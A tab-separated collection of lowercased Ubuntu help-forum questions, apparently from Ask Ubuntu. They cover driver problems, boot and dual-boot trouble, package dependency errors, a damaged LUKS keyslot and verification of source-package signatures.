509459	can not type \ , | and ~ on ubuntu inside virtualbox	i have installed a virtual box ubuntu 14.04 . i run into two very basic problems : somehow i can not type \ | ~ characters in terminal or textfile . it is a clean and fresh install under virtual box . in attempt to solve problem 1 , i try to rename or remove /etc/inputrc . ( ~/.inputrc seems not to exist in my user folder ) . but how do i use graphical sudo to obtain the rights to rename or remove the file ? or how do i get about problem 1 otherwise ?
509460	context menu on chrome turns blank when mouse is over	i am using ubuntu gnome and when i am on google chrome the context menu turns blank when the cursor is over an option . only google chrome has this issue . here a screenshot : i have tested on unity , kde and gnome classic and it works fine . i 've seen this bug only on gnome 3.10 and 3.12 . is this bug related to gnome or google chrome ? do you know how to solve this or do i need to wait a new version of google chrome ( or gnome ) ? the versions : ubuntu gnome 14.04.1 lts gnome 3.12 ; google chrome 36.0.1985.125 ;
509461	unclean filesystem error when installing	i am trying to install ubuntu ( or an ubuntu based distro like elementary or deeping ) and i get this error . how can i fix that ? my machine has 2 ssds , one with windows 8.1 and one empty , and an hdd for data .
509462	i just want to install wine . it 's asking me to remove packages that i use	i 've been trying for days now to install wine . i even went so far as to install synaptic and run it through ssh to pop up on my windows machine . when i go to install anything to do with wine , it wants to remove a huge list of packages that i actually use , like php5 , and other important stuff . what is the deal with this thing ? i do n't even know where to start .
509464	download failed in youtube-dl	my youtube-dl was working fine but when i tried to download videos after certain times it just stopped working . it just showed the prompt sign in the next line . i tried to use all the uninstall commands like purge and remove but all in vain . please help me . this is the command i execute , but the videos are not being downloaded : youtube-dl https : //www.youtube.com/watch ? v=1gwmvcxdsg4
509465	the old broadcom 43xx beast strikes again ... 14.04 32bit	i recently rescued a `` bricked '' intel imac5 by installing ubuntu studio 14.04 32bit as the only os . apple techs swore the gpu was completely fried , but with ubuntu the thing barely throws any heat and it runs fine ( for my purposes ) . so i consider this a success story . however , once i started messing with broadcom drivers things started to get hairy . additional drivers supplied the broadcom-sta , and after reboot the whole system was super slow and no networks were detected . per forum suggestions i have purged bcmwl-kernel-source and installed firmware-b43-installer b43-fwcutter and had the exact same results . next i found a post that listed my hardware ( bcm4321 ) requiring linux-firmware-nonfree to work in 14.04 ... again a slow system and no wireless detected . i 've tried each of these methods a few times adjusting the blacklist.config appropriately , and the results are always the same . as a last resort i 've taken the ndiswrapper approach . this does not slow my system , however no networks are detected and no wlan shows up in iwconfig . while the ndiswrapper gui says that the driver detects the hardware . i 'm at a loss here and almost ready to buy a really long ethernet cable . if anyone has any suggestions i 'd be so grateful . i 'm hoping i just overlooked something dumb ? lspci= *-network description : network controller product : bcm4321 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:10 memory : c8200000-c8203fff memory : c8000000-c80fffff iwconfig yields= lo no wireless extensions . eth0 no wireless extensions . this one is interesting rfkill list all just shows bluetooth= 0 : hci0 : bluetooth soft blocked : yes hard blocked : no update ! i ran some software updates as they became available ... i have cycled through trying all of the available drivers once more . unfortunately , i still have no wifi , but installing these drivers no longer slows down or locks up my system .
509466	how to send personalized emails to members of a contact-list in thunderbird	i 'd like to send a personalized email to all members of a given contact-list in thunderbird . for example i 'd like to write dear [ [ [ title ] ] ] [ [ [ lastname ] ] ] , which is then ( depneding on the current contact ) converted into : dear prof. hugenhauer , dear mr. smith , ... is there a way ( e.g . a plugin ) that allows personalized mails ?
509469	kde uses gnome notification system instead of knotify	i tried to install kubuntu-active on the kubuntu trusty and it failed to start . so , i removed it and many packages has `` active '' in it name related to kde active . kde runs ok now but one issue : it uses gtk+ notifications instead of knotify ( although it is already running ) . the issue remains even after rebooting . how can i solve this ?
509471	package crash problem	e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/eg.archive.ubuntu.com_ubuntu_dists_precise_univers e_binary-i386_packages e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . i can neither update anything nor open synaptic . how do i solve this problem ?
509472	full screen mode in a dual monitor work	i used to work with two displays . as usual i make full screen on the second monitor for watching web video while continuing to work on the laptop monitor . in ubuntu it 's always opening in full screen mode on the laptop monitor . is it possible to open full screen on the second monitor if so , how can i do this ?
509473	touchpad hardly usable when buttons are tracked	i noticed a severe problem with using ubuntu on a laptop with a touchpad , when the touchpad also has the buttons implemented ( see picture 1 from digitaltrends ) . drag and drop is simply impossible , as is group selecting items due to the way the buttons are recognized and the gestures work . an example : when i click a file icon in the file explorer and place the second finger on the touchpad to start dragging , the cursor jumps to the location of the second finger - in other words , the location is interpreted in absolute values instead of relative . an example would be the dell inspiron 7000 or the dell inspiron mini 10 .
509478	remove ubuntu-desktop	i 've installed xubuntu-desktop and i want to get rid of all the ubuntu-desktop and unity-related packages . but all the guides i 've found are either outdated ( psychocatz ) or simply do n't work ( aptitude ) . what can i do to remove all the ubuntu-desktop packages ?
509481	win 8.1 + ubuntu 14.04	i have a sony vaio laptop , bought around june 2012 with windows 7 pre-installed . my bios is a insydeh20 rev 3.7 . i 'm using ubuntu alone for a long time now , i would like to install a dual-boot with windows 8.1 alongside ubuntu 14.04 lts . first , i made a backup of all my files and formatted my hard drive . i turned on the uefi option in my bios and i changed the partition table from mbr to gpt . then , i installed windows 8 , i let it made all the partition it wanted . i upgraded it to windows 8.1 , then i turned off the fast boot option . i installed ubuntu on another partition and i created a last partition to share files between windows and ubuntu . when i rebooted , i could n't see grub . it loaded right into windows.. so i used boot-repair from my ubuntu liveusb but that did n't change anything ! here is the link from boot-repair : http : //paste.ubuntu.com/8008454/ so i would like to have grub when my computer boots . also , i can not turn off the secure boot option . there is no such thing in my bios and i ca n't see the uefi setting in windows . i mean when i 'm here there is no uefi firmware settings . hope this is well explained , let me know if you need more informations , antoine
509485	i 've jus got ubuntu 14.04 i changed from google chrome ( i hav a chromebook ) and im finding it hard installing nfs world	it says i have unmet dependicies and so forth i tried getting wine but that was unsuccessful aswell ... can sumone help me please user @ chrubuntu : ~ $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed or wine1.7 but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried to update and upgrade when i updated it this is what appeared : ( it runs a few stuff inbetween ) reading package lists ... done w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : you may want to run apt-get update to correct these problems why is it saying that and i just ran the update ? user @ chrubuntu : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following package was automatically installed and is no longer required : kde-l10n-engb use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i need some help i only changed to this so i could play nfs world .
509487	what 's the official method for checking integrity of a source package ?	i want to add a feature to pam , and i figured a good starting point was to download the libpam-modules source . on download , i notice this warning : gpgv : ca n't check signature : public key not found what is the official method for verifying the integrity of source packages , when apt-get can not find the public key ? the newest version of ubuntu-keyring and debian-keyring packages are installed already . there are ways to find the corresponding public key and install it . however that in itself does not provide integrity , because in effect it is trusting the contents of the dsc file to tell me which public key to use to verify the signature on the dsc file . is the gpg signature on the dsc file a critical part of the integrity verification ? could a man in the middle or a rouge mirror serve a malicious version of the file where the warning from gpg is the only indication something bad is happening ? or does apt-get have other means of validating the integrity ? where would i find official documentation on the security model ? ideally i would like to understand the full trust path from the install image to the source package i am downloading . the full output from the download was this : $ apt-get source libpam-modules reading package lists ... done building dependency tree reading state information ... done picking 'pam ' as source package instead of 'libpam-modules' notice : 'pam ' packaging is maintained in the 'bzr ' version control system at : https : //code.launchpad.net/~ubuntu-core-dev/pam/ubuntu please use : bzr branch https : //code.launchpad.net/~ubuntu-core-dev/pam/ubuntu to retrieve the latest ( possibly unreleased ) updates to the package . need to get 2,043 kb of source archives . get:1 http : //dk.archive.ubuntu.com/ubuntu/ trusty/main pam 1.1.8-1ubuntu2 ( dsc ) [ 2,510 b ] get:2 http : //dk.archive.ubuntu.com/ubuntu/ trusty/main pam 1.1.8-1ubuntu2 ( tar ) [ 1,893 kb ] get:3 http : //dk.archive.ubuntu.com/ubuntu/ trusty/main pam 1.1.8-1ubuntu2 ( diff ) [ 147 kb ] fetched 2,043 kb in 6s ( 316 kb/s ) gpgv : signature made fri 31 jan 2014 11:12:23 pm cet using rsa key id 64792d67 gpgv : ca n't check signature : public key not found dpkg-source : warning : failed to verify signature on ./pam_1.1.8-1ubuntu2.dsc
509490	wrong window displayed launching activity log manager	when i launch the activity log manager from dash i get the security & privacy window from system settings displayed and not the activity log manager . i presume this is incorrect ?
509491	downgrade to php 5.4 on ubuntu 14.04	i need to downgrade to php 5.4 mostly because of the mysql_* functions support . this question was already asked but the answers seems to be old and not working anymore . i 've been searching for solution for hours but did n't find any . can anybody please help me out ?
509492	ntop hosts info page hangs	my ntop installation seems to work -- mostly . however the page that is supposed to show specific host information hangs . it shows what looks like the background of the page with no data , then a wheel rotating as if it is waiting for something . if i turn on the error console in the browser i get this message when i try to load the page : [ error ] typeerror : 'undefined ' is not a function ( evaluating 'child.classname.split ( ' ' ) ' ) mygetelementsbyclassname ( reflection.js , line 15 ) addreflections ( reflection.js , line 152 ) onload ( reflection.js , line 171 ) the browser is on a mac and does the same thing with safari , chrome , and firefox . the host is ubuntu 14.04 , and the ntop -- version is : welcome to ntop v.5.0.1 ( 32 bit ) i suspect what is going on is that an incompatible jquery package has been pulled in but i have no idea of how to find or fix that . does anyone have any suggestions ?
509493	webmin on vagrant and ubuntu environment page not found	hi i 've installed webmin using a vagrant and ubuntu setup , i 'm using laravel too and i 've installed webmin on my ubuntu vm machine and at the end of the installation it says it is available at this url https : //vaprobash:10000/ but it says this page is unavailable does anyone know how i can debug or fix ? do i need to do the following : if you want to connect from a remote server and your system has a firewall installed , see this page for instructions on how to open up port 10000. http : //www.webmin.com/firewall.html i do n't see any mac instructions though , any ideas ? followed instructions on installation here : http : //www.webmin.com/deb.html i 've tried this as per another question i found on here : iptables -i input 1 -p tcp -- dport 10000 -j accept and then did the following command iptables -l i get the following output : chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : webmin accept tcp -- anywhere anywhere tcp dpt : webmin accept tcp -- anywhere anywhere tcp dpt : webmin chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination not sure what is going wrong here , any ideas ? also does it matter than i have xampp installed on my mac , with vhosts setup natively ?
509495	symbolic icons for nemo	is it possible to change nemo ( source code probably ? ) in order to use symbolic icons in the sidebar instead of the usual folder icons , just like nautilus does ? i.e . : i want nemo to use folder-downloads-symbolic.svg instead of folder-downloads.svg in the `` places '' panel
509498	is there a standard wifi driver for the edimax ew-7811un ?	i have this wifi dongle ( edimax ew-7811un ) is there an ubuntu package i can use to get it working ? if not , how can i get this wifi to work ?
509500	black screen after ubuntu install nomodeset does n't help	i have ubuntu 14 . i could install it with playing with the nomodeset flag . after installing also this does not help the black screen is purple when changing to nomodeset . $ lwhsc - c video valleyview gen7 from intel
509504	directory is unmounted	when i run ubuntu 14.04 it 's given me a message told me that tmp directory is unmounted , however its give me an options one of them is to ignore this . so i choose that , but it 's cause a problem such as , when i write ls -l command , the terminal exit .
509505	secondary ssd stuck as read only	i am having trouble getting my second ssd to work with linux . i recently switched from windows to ubuntu 14.04 and i am still learning linux . i can see my second drive under devices in the file manager , but it is stuck as read-only . if i right click , go to properties , then permissions , all the options are greyed out . i tried searching for information and found a few posts about mounting drives . i tried adding this line to fstab , uuid= '' 502fd123-7748-463c-9155-ad5744a4804b '' /media/calvin ext4 defaults , windows_names , locale=en_ca.utf8 0 0 but that does n't help . i ran fdisk -l and got this output ; disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000bee68 device boot start end blocks id system /dev/sda1 * 2048 200988671 100493312 83 linux /dev/sda2 200990718 234440703 16724993 5 extended /dev/sda5 200990720 234440703 16724992 82 linux swap / solaris disk /dev/sdb : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders , total 468862128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000448ac device boot start end blocks id system /dev/sdb1 2048 468860927 234429440 5 extended /dev/sdb5 4096 468860927 234428416 83 linux the output of mount | grep /dev/sdb is ; /dev/sdb5 on /media/calvin/storage type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) any help would be greatly appreciated . if there is any other information i should have provided please let me know and i will add it as soon as i am able .
509507	please explain the parameters 'noexpose ' and 'cycle ' in xset	i have been trying for a long time to prevent my screen from blanking every 20 minutes . i understand there are many interlocking layers of applications that can do this and it is not straightforward at all to achieve this behavior . here is a good resource for background reading : ubuntu 12.10 `` turn screen off when inactive for : never '' still turns off i do not understand some of the parameters controlled by xset . one is the 'expose ' or 'noexpose ' setting . the other is the 'cycle ' time . screen saver : prefer blanking : no allow exposures : no timeout : 0 cycle : 0 you can change the value of 'allow exposures ' by typing 'xset s expose ' or 'xset s noexpose ' . independently , you can control the values of 'timeout ' and 'cycle ' with 'xset s 0 0 ' . however i can not find a decent explanation anywhere of what these parameters do . if you google it , you will just find a bunch of people modifying these parameters to prevent screen blanking without understanding what they do . if you read the 'xset ' manpage , you get this : the 'expose ' flag sets the preference to allow window exposures ( the server can freely discard window contents ) , while 'noexpose ' sets the preference to disable screen saver unless the server can regenerate the screens without causing exposure events . i ca n't understand this . which value is better to disable blanking ? it goes on to say : the length and period parameters for the screen saver function determines how long the server must be inactive for screen saving to activate , and the period to change the background pattern to avoid burn in . i guess by 'period parameter ' they mean `` the second numerical argument to xset s n n which is described as cycle by xset q '' ? and this is only relevant to some sort of alternating-pattern mode of xscreensaver ? again , i mainly want to know which value is best for disabling screen blanking .
509509	running tv by ethernet from pc on wifi	my desktop computer is running ubuntu 14.04 . it is connected by wifi to my router . my tv has an ethernet port . i have that connected to the ethernet port on my pc . i have netflix on my ubuntu box . i would like to be able to feed that to the tv over the lan cable and to share the internet connection from my pc to the tv . is this possible ? how do i configure the ubuntu box to do this ?
509511	ca n't swich between ubuntu and microsoft and am stuck in ubuntu . please help !	in order to switch to microsoft windows 8.1 from ubuntu i would go into my bios and click f8 to get to a menu where i can pick what to boot from . i clicked on my hard drive ( were i have both ubuntu and windows ) as usual . after that it should have gone into another menu were i could choose which operating system i wanted to boot into , but it did n't and it went straight into ubuntu i am trying to fix it and so i went into settings and when i clicked on the section that shows the hard drive space partitioned for windows it said this : unable to access `` 649 gb volume '' error mounting /dev/sda2 at /media/jd/543652053651e88e : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/jd/543652053651e88e '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . does anyone know how i can fix this so i can get back into windows ?
509512	what laptops are guranteed to work for ubuntu ? is there such thing as an ubuntu certification program , which guarantees compatability ?	i am looking for the best laptop that i can buy to run ubuntu 14.04 on . i want to make sure that if i buy a laptop , i will not have to worry about incompatibility . is there a list or repository which i can refer to so i can see the options of laptop brands or models which are safe to buy ?
509513	ubuntu 12.04 boot problem not starting desktop and login screen	i had installed ubuntu 12.04 through wubi ( with windows7 ) about an year ago . it was working fine till yesterday aug 10th , 2014 . but when i tried today booting ubuntu , two erros appear first : hd [ 0,0 ] : no wubildr hd [ 0,1 ] : 'perfix ' is not set ( although these errors appeared even before but i was able to see my desktop ) , after then , a purple screen appeared for 4-5 seconds , then `` ubuntu '' symbol appears and then blank screen . i tried to fix it by command-line ( bcoz it is working fine with command line using login name and password ) using 'startx ' command , but it failed and showed some information which included words like 'fatal error : no scrren found ' and other like that . what should i do to fix it ? when i used ubuntu last time , i had installed 'wine ' and through it , notepad++ was installed . may be it occuring problem .
509514	ubuntu 14.04 does n't boot	i have installed ubuntu 14.04 on my computer and worked ok for about 2 months but now when i try booting it it does n't , the message that appears is : wn-block ( 0,0 ) [ 0.747081 ] cpu : 1 pid : 1 comm : swapper/0 not tainted 3.13.0-33-generic # 58-ubuntu [ 0.747132 ] hardware name : dell inc. inspiron n5010/0td2k6 , bios a08 09/13/2010 [ 0.747183 ] 0000000000008000 ffff880131e3dd70 ffffffff8171bd04 ffffffff81a3c210 [ 0.747373 ] ffff880131e3de68 ffffffff81714f05 ffffffff00000010 ffff880131e3de78 [ 0.747566 ] ffff880131e3de18 ffffffff81715a26 ffff880131e3de88 00000000000000cc [ 0.747761 ] call trace : [ 0.747810 ] [ < ffffffff8171bd04 > ] dump_stack+0x45/0x56 [ 0.747861 ] [ < ffffffff81714f05 > ] panic+0xc8/0x1d7 [ 0.747908 ] [ < ffffffff81715a26 > ] ? printk+0x067/0x69 [ 0.747959 ] [ < ffffffff81d3646a > ] mount_block_root+0x225/0x2b0 [ 0.748008 ] [ < ffffffff81d36692 > ] mount_root+0x53/0x56 [ 0.748056 ] [ < ffffffff81d36801 > ] prepare_namespace+0x16c/0x1a4 [ 0.748105 ] [ < ffffffff81d3616e > ] kernel_init_freeable+0x1f3/0x200 [ 0.748155 ] [ < ffffffff81d358e5 > ] ? do_early_param+0x88//0x88 [ 0.748205 ] [ < ffffffff8170a1e0 > ] ? rest_init+0x80/0x80 [ 0.748252 ] [ < ffffffff8170a1ee > ] kernel_init+0xe/0x130 [ 0.748303 ] [ < ffffffff8172c63c > ] ret_from_fork+0x7c/0xb0 [ 0.748351 ] [ < ffffffff8170a1e0 > ] ? rest_init+0x80/0x80 can anyone tell me what to do and if that is a virus ?
509515	what is the difference between boot loader and bootstrap loader ?	how boot loader is different from bootstrap loader . according to me bootstrap loaders are stored in rom and boot loaders are in hard disk in mbr ( please correct me if i am wrong ) . bootstrap loader is the first program which get executed after startup . now i am not getting the meaning of these sentences : - after power on , the bootloader is controlling the board and does not rely on the linux kernel on any way . and the bootstrap loader acts as a glue between the bootloader and the linux kernel . what does it mean ? and why we require both of them ?
509534	using ubuntu-device-flash on a nexus n7 only installs the rescue system	following this developer.ubuntu.com guide i flashed my nexus 7 via # ubuntu-device-flash -- channel=trusty -- bootstrap , got this [ 1 ] output , but after rebooting the following from the install ubuntu section does n't happen here : then , the parts of the images are deployed to the device . ubuntu is deployed to the devices as a ârecoveryâ image . then , the device boots from the recovery image and installs ubuntu as the normal os . finally , the device boots into ubuntu for devices . it only boots into the normal bootloader , and ubuntu is only present when i select `` recovery mode '' . this menu has an `` -install zip '' option where i guess i must continue , but i can not find out where i would find the relevant zip-file or how to apply it exactly . i can see the device though and use adb .. to reboot or start a shell . 1 : # ubuntu-device-flash -- channel=trusty -- bootstrap 2014/08/10 22:23:41 expecting the device to be in the bootloader ... waiting 2014/08/10 22:23:42 device is |grouper| 2014/08/10 22:23:42 flashing version 294 from trusty channel and server https : //system-image.ubuntu.com to device grouper /root/.cache/ubuntuimages/ubuntu-touch/trusty/grouper/version-294.tar.xz /root/.cache/ubuntuimages/gpg/image-signing.tar.xz /root/.cache/ubuntuimages/gpg/image-master.tar.xz /root/.cache/ubuntuimages/pool/device-08c13901d732c4ff24c342fd62f949ef4d92dbfe4bbdd9b3aee5df327619d30b.tar.xz 2014/08/10 22:24:17 start pushing /root/.cache/ubuntuimages/ubuntu-touch/trusty/grouper/version-294.tar.xz to device 2014/08/10 22:24:17 start pushing /root/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/08/10 22:24:17 start pushing /root/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/08/10 22:24:17 start pushing /root/.cache/ubuntuimages/pool/device-08c13901d732c4ff24c342fd62f949ef4d92dbfe4bbdd9b3aee5df327619d30b.tar.xz to device 2014/08/10 22:24:17 start pushing /root/.cache/ubuntuimages/pool/ubuntu-035dbe1b5088d07d386c1c6a7833c029ae1ac5ab2e3b1a86a1a3571f2566362c.tar.xz to device 2014/08/10 22:24:17 done pushing /root/.cache/ubuntuimages/ubuntu-touch/trusty/grouper/version-294.tar.xz to device 2014/08/10 22:24:17 done pushing /root/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/08/10 22:24:17 done pushing /root/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/08/10 22:25:12 done pushing /root/.cache/ubuntuimages/pool/device-08c13901d732c4ff24c342fd62f949ef4d92dbfe4bbdd9b3aee5df327619d30b.tar.xz to device 2014/08/10 22:29:01 done pushing /root/.cache/ubuntuimages/pool/ubuntu-035dbe1b5088d07d386c1c6a7833c029ae1ac5ab2e3b1a86a1a3571f2566362c.tar.xz to device 2014/08/10 22:29:01 created ubuntu_command : /root/.cache/ubuntuimages/ubuntu_commands037385836 2014/08/10 22:29:01 rebooting into recovery to flash
509539	what is the best way to migrate to ubuntu from centos 6.5 ?	used fedora until gnome 2 vanished and mate was not yet fully functional . migrated to centos ( now 6.5 ) , and am now building a new machine , wondering if i should try returning to fedora ( 19 ) now that mate works well . i 'm hearing good things about ubuntu and wondering what the best way would be to 'start over ' and migrate to this os ; anyone interested in sharing ?
509542	wicd-curses problem on ubuntu 14.04	how to get wicd-curses to work on ubuntu 14.04 . this command works great on ubuntu 12.04 .
509543	shutdown of ubuntu 14.04 requires authentication	i 'm running ubuntu server 14.04 ( amd64 ) headless , but with xfce4 as a desktop gui installed . because of a hwe ( if i 'm correct ) message that i was running out of support , i upgraded today by doing a complete clean install of ubuntu server 14.04 . so , after starting my pc and grub and all that has finished , my services are running but not the gui . only after logon i can start the gui typing startx . in the xfce4 desktop there is a menu item for logoff ( afmelden in dutch : ) ) . in ubuntu 12.04 lts i could simply press 'shutdown ' to turn off the computer . now i suddenly need authentication to shutdown . been searching the web , but ca n't seem to find the cause or solution . the proposed solution that multiple users might be logged on is not the case . although : when i start a terminal while running xfce4 , when typing who i see : martin @ jupiter : ~ $ who martin tty1 2014-09-12 22:25 martin pts/1 2014-09-12 22:49 ( :0.0 ) further information : when plugging in usb devices it will try to automount it , but also displays a authentication question ... .. problem is that the kids have their own ( non-sudo ) account , and they can turn on the computer , but not turn it off properly because they are non-sudo'ers .
509547	how to access a website under ubuntu	i am newbie to ubuntu and trying to migrate from windows but there is something i ca n't understand in web developing . in windows i just install the server and make a folder in the www folder or htdoc and this folder works as a site to me when i ask it through the browser i can access it in ubuntu . i installed lamp and phpmyadmin and created the folder in /var/www . after , i changed the permissions for www to 777 so i can create the folder through netbeans but still i ca n't access my site from the browser . i searched and i found weird instructions . from 10 steps why is that i am simply using the desktop version of ubuntu 14.04 lts . i do n't want to make it a universal site for people . it is just for my testing propose only . could anyone help me ?
509549	declare a variable when running the script bash	how to declare the variable content when running the script ? i know that is possible to use $ 1 $ 2 $ 3 to set a variable when running the script ./script.sh this is sparta , but i did not found a way to set explicit . like ./script.sh url=www.google.com command=wget this is possible ?
509550	compatiple printer list	i have tried to search for a printer to use with my new install and so far , i have n't found a sure thing . does anyone have a list of compatible printers to use with ubuntu 12.04 ?
509553	some programs ( eclipse ) show their tooltips with an unfitting black background	here is a tooltip from eclipse , that pops open when you press ctrl+o : is this intentional ? white text on black background does not exactly fit in , and it would be much more readable if it used some standard theme . can i make it so ?
509554	incomplete opengl es 2.0 support	i 'm trying to run the latest scilab with lubuntu 14.04 , and i get an error `` mesa 10.1.3 implementation error : incomplete opengl es 2.0 support '' this is on a 10 year old dell dimension 8300 with all the original stuff . the card is reported in the `` software & updates '' program `` additional drivers '' window as an nvidea geforce fx 5200 . i 've tried this both with the x.org x server driver , and the nvidia legacy binary driver . the result was the same both ways . clues for the clueless would be much appreciated here . thanks .
509555	how can i recover my lost windows partition ?	i was trying to do a dual boot on my hp envy 15j machine and when installing ubuntu i accidentally replaced windows with ubuntu . how can i get my windows partition back ? i bought my computer online and it doesnât have an dvd drive so it didnât come with an windows installation disk . i installed ubuntu with a live usb . fortunately i backed up all my windows files on an external drive but i didnt create a recovery drive . also when booting normally with ubuntu my computer screen goes blank and nothing happens . i had to boot into the ubuntu recovery mode in order for anything to work .
509559	build ubuntu from source code cd	this is a very theoretical question and i am not in the need to actually do this , but i find the question still highly interesting ubuntu offers source code cd downloads : http : //cdimage.ubuntu.com/releases/12.04/release/source/ i was always wondering , if this is could be really useful for someone wanting to compile the whole os from scratch . i know that may surely not be the idea of this offer , but is there any systematic way to auto build the whole distribution , or is this simply only a collection of the sources of all default installed packages ? what about build deps of source packages and build deps of build deps ? is there after all a tool that would automate building ubuntu from such a source cd ?
509563	i broke my luks disk by adding a key with the same passphrase and then removing it	this is a fun story . i wanted to change my passphrase , but i did something incredibly stupid ( it was rather late and i had a pretty f***** up day/evening full of waterspouts , drunken drivers and a broken car battery ) . but anyway , first i ran : cryptsetup luksaddkey /dev/sda5 then entered my passphrase . then i thought i had to confirm the thing , so i entered it again . ( mistake 1 , reading is important ) when reading back on the terminal i saw , it actually asked for a new one . i thought , oh this maybe bad , so i tried to open the volume and could n't . i checked luksdump and saw i had two keyslots . and i did n't make an backup of the header . ( mistake 2 , preparation is vital ) i assumed i broke my disk , so i removed the extra passphrase ( mistake 3 , think before you do ) : cryptsetup luksremovekey /dev/sda5 then i checked luksdump and i removed the wrong one : keyslot 0 : disabled i tried to open it and i could n't with the old passphrase . now i knew i borked it completely . my question is in what state my setup is . i have a couple of options : the setup is still fine , but the new passphrase contains typos . the setup is still fine , but i lost the key . the setup is in some undefined state . i can see that i can only recover in case number 1 . it is not too bad , i have backup of most of the data , but i still would like to know what i caused and if i can recover from it . if it is some typo , i can write some program to try out various typos i make . edit case 1 is also not feasible either . the passphrase was 40 characters long without the spaces . so say i made a type ( and did n't displace a space ) . then i have +/- 6 possibilities to type a key wrong . i do not make the whole time spelling errors , say i could have made something between 1 and 3 typos . then i already can scan 10321 ( 6^0 + 40 * 6^1 + 40 * 6^2 ... ) passphrases , which will take an equivalent amount of seconds , that is already 2+ hours on my laptop . when i take character swaps in account , the amount will explode further . if i swapped two characters , i need to check 40 variants of my original password for each possible typo . this costs 4 days . ( 40 * ( 6 ^ 0 * 40 + 6 ^ 1 * 40 + 6 ^ 2 * 40 .. ) ) and the two hours in the case i did n't do a space swap . then we have deletion , insertions and swaps over more than one character , maybe more typos to consider etc .
509566	unable to start topcoder arena in ubuntu 14.04	when i want to clear cache using javaws - viewer these error comes . i am trying to launch my topcoder arena . picked up java_tool_options : -javaagent : /usr/share/java/jayatanaag.jar exception in thread `` main '' java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at sun.instrument.instrumentationimpl.loadclassandstartagent ( instrumentationimpl.java:382 ) at sun.instrument.instrumentationimpl.loadclassandcallpremain ( instrumentationimpl.java:397 ) caused by : java.security.accesscontrolexception : access denied ( `` java.lang.runtimepermission '' `` getenv.jayatana_libagpath '' ) at java.security.accesscontrolcontext.checkpermission ( accesscontrolcontext.java:372 ) at java.security.accesscontroller.checkpermission ( accesscontroller.java:559 ) at java.lang.securitymanager.checkpermission ( securitymanager.java:549 ) at java.lang.system.getenv ( system.java:885 ) at com.jarego.jayatana.agent.premain ( unknown source ) ... 6 more fatal error in native method : processing of -javaagent failed aborted ( core dumped ) my arena does n't launch . when i try to open contestappletprod.jnlp icedtea starts and in 2 seconds its goes away , i mean it gets stopped and it doesnt launch my arena . i tried to clear the cache using javaws -viewer and also with javaws -xclearcache or rm -rf ~/.icedteacache/cache . but nothing worked . what should i do now to launch my arena ? n.b : i reinstalled icedtea-plugin , openjdk-7-jre and jdk , but nothing worked .
509567	ca n't run minecraft..help ?	i recently got an ubuntu computer with 14.04 on it . i tried to play minecraft , installed some intel drivers from online through the terminal . i can not play anything higher than 5.7 and on 5.7 it 's all black with chunks . i 've seen people play with a lower version of ubuntu and was wondering how i can fix this ? commands through the terminal to upgrade the drivers or something would be great update : i installed the drivers through a terminal command , where i installed intel drivers and updated them . and minecraft has versions , that have different updates on them . my computer can only go up to update 1.5.7 , where there is now 1.7.10
509569	convert ogg ( and other formats ) to midi ?	are there any methods to doing this on ubuntu 14.04 ? what kind of quality should i expect from the midi file ?
509570	not all buttons work on ps3 bluetooth remote	i have a ps3 bluetooth remote which i have paired with my ubuntu 14.04.1 system and a lot of the buttons work ( i.e . they generate events which 'xev ' can see ) however a significant number do not ( l1-l3 , r1-r3 and others ) . unfortunately i need those buttons to control the volume so i am looking for a way to map them somehow . i know the kernel sees those as events because 'evtest ' sees their key presses , however x does not . note that previously i had this working on an older ubuntu system ( 10.04.4 ) by following http : //wiki.xbmc.org/index.php ? title=how-to : setup_ps3_bd_remote however that does n't seem correct anymore ( input.conf does n't hold mappings any more ) .
